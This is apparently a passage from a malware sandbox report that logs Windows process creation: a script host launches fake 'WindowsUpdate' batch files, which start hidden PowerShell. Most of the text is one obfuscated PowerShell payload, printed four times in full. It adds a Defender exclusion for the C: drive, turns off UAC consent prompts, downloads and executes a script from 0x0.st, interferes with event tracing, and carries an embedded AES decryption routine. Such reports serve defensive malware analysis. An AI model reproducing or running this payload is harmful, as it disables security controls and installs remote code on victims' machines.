"[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_706.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_706.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_394.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_394.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_801.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_801.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192YXIuRGlzcG9zZSgpOwkkcmV0dXJuX3Zhcjt9ZnVuY3Rpb24gaWJweGdtaGp0d2tiZ3puKCRwYXJhbV92YXIpewlJRVggJyR
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Roaming\WindowsUpdate_394.bat
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /K "C:\Users\user\AppData\Roaming\WindowsUpdate_394.bat"
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('SUVYKFtUZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcoW0NvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQ21aMWJtTjBhVzl1SUVGa1pDMVhhVzVrYjNkelJHVm1aVzVrWlhKRmVHTnNkWE5wYjI0Z2V3b2dJQ0FnY0dGeVlXMG9DaUFnSUNBZ0lDQWdXM04wY21sdVoxMGtjR0YwYUFvZ0lDQWdLUW9LQ2lBZ0lDQWtaWGhwYzNScGJtZEZlR05zZFhOcGIyNXpJRDBnUjJWMExVMXdVSEpsWm1WeVpXNWpaU0I4SUZObGJHVmpkQzFQWW1wbFkzUWdMVVY0Y0dGdVpGQnliM0JsY25SNUlFVjRZMngxYzJsdmJsQmhkR2dLSUNBZ0lHbG1JQ2drWlhocGMzUnBibWRGZUdOc2RYTnBiMjV6SUMxdWIzUmpiMjUwWVdsdWN5QWtjR0YwYUNrZ2V3b2dJQ0FnSUNBZ0lDTWdRV1JwWTJsdmJtRWdieUJrYVhKbGRNT3pjbWx2SU1PZ2N5QmxlR05zZFhQRHRXVnpDaUFnSUNBZ0lDQWdRV1JrTFUxd1VISmxabVZ5Wlc1alpTQXRSWGhqYkhWemFXOXVVR0YwYUNBa2NHRjBhQW9nSUNBZ0lDQWdJRmR5YVhSbExVaHZjM1FnSWtWNFkyeDFjOE9qYnlCaFpHbGphVzl1WVdSaE9pQWtjR0YwYUNJS0lDQWdJSDBnWld4elpTQjdDaUFnSUNBZ0lDQWdWM0pwZEdVdFNHOXpkQ0FpVHlCa2FYSmxkTU96Y21sdklDUndZWFJvSUdyRG9TQmxjM1REb1NCdVlYTWdaWGhqYkhWenc3VmxjeTRpQ2lBZ0lDQjlDbjBLQ2dwQlpHUXRWMmx1Wkc5M2MwUmxabVZ1WkdWeVJYaGpiSFZ6YVc5dUlDMXdZWFJvSUNKRE9sd2lDZ29LSkhKbFoxQmhkR2dnUFNBaVNFdE1UVHBjVTA5R1ZGZEJVa1ZjVFdsamNtOXpiMlowWEZkcGJtUnZkM05jUTNWeWNtVnVkRlpsY25OcGIyNWNVRzlzYVdOcFpYTmNVM2x6ZEdWdElnb2tjbVZuVG1GdFpTQTlJQ0pEYjI1elpXNTBVSEp2YlhCMFFtVm9ZWFpwYjNKQlpHMXBiaUlLSkhKbFoxWmhiSFZsSUQwZ01Bb0tDbWxtSUNndGJtOTBJQ2hVWlhOMExWQmhkR2dnSkhKbFoxQmhkR2dwS1NCN0NpQWdJQ0JPWlhjdFNYUmxiU0F0VUdGMGFDQWtjbVZuVUdGMGFDQXRSbTl5WTJVS2ZRb0tDbE5sZEMxSmRHVnRVSEp2Y0dWeWRIa2dMVkJoZEdnZ0pISmxaMUJoZEdnZ0xVNWhiV1VnSkhKbFowNWhiV1VnTFZaaGJIVmxJQ1J5WldkV1lXeDFaUW9LVjNKcGRHVXRTRzl6ZENBaVZVRkRJRU52Ym5SeWIyd2dVRzl3VlZBZ1FubHdZWE56WldRdUlncFhjbWwwWlMxSWIzTjBJQ0pET2lCQlpHUmxaQzRpQ2c9PScpKSk7aWV4IChbVGV4dC5FbmNvZGluZ106OlVURjguR2V0U3RyaW5nKFtDb252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ2FXVjRJQ2hKYm5admEyVXRWMlZpVW1WeGRXVnpkQ0F0VlhKcElDSm9kSFJ3Y3pvdkx6QjRNQzV6ZEM4NExUVlRMbkJ6TVNJcCcpKSk7ZW1wdHlzZXJ2aWNlcyAtZXR3O1N0YXJ0LVNsZWVwIC1TZWNvbmRzIDU7ZnVuY3Rpb24geWxjZnhmZXRkd2pzZGlyKCRwYXJhbV92YXIpewkkYWVzX3Zhcj1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5BZXNdOjpDcmVhdGUoKTsJJGFlc192YXIuTW9kZT1bU3lzdGVtLlNlY3VyaXR5LkNyeXB0b2dyYXBoeS5DaXBoZXJNb2RlXTo6Q0JDOwkkYWVzX3Zhci5QYWRkaW5nPVtTeXN0ZW0uU2VjdXJpdHkuQ3J5cHRvZ3JhcGh5LlBhZGRpbmdNb2RlXTo6UEtDUzc7CSRhZXNfdmFyLktleT1bU3lzdGVtLkNvbnZlcnRdOjooJ2duaXJ0UzQ2ZXNhQm1vckYnWy0xLi4tMTZdIC1qb2luICcnKSgnQm9iZG1oVWVZQUtFUElBZDhJSEtxVHFzc0JobTZKNmZQaEJwSnBSY3I4OD0nKTsJJGFlc192YXIuSVY9W1N5c3RlbS5Db252ZXJ0XTo6KCdnbmlydFM0NmVzYUJtb3JGJ1stMS4uLTE2XSAtam9pbiAnJykoJ0l3Zmx1djE0TFVqSG9zU0drMmlRVUE9PScpOwkkZGVjcnlwdG9yX3Zhcj0kYWVzX3Zhci5DcmVhdGVEZWNyeXB0b3IoKTsJJHJldHVybl92YXI9JGRlY3J5cHRvcl92YXIuVHJhbnNmb3JtRmluYWxCbG9jaygkcGFyYW1fdmFyLCAwLCAkcGFyYW1fdmFyLkxlbmd0aCk7CSRkZWNyeXB0b3JfdmFyLkRpc3Bvc2UoKTsJJGFlc192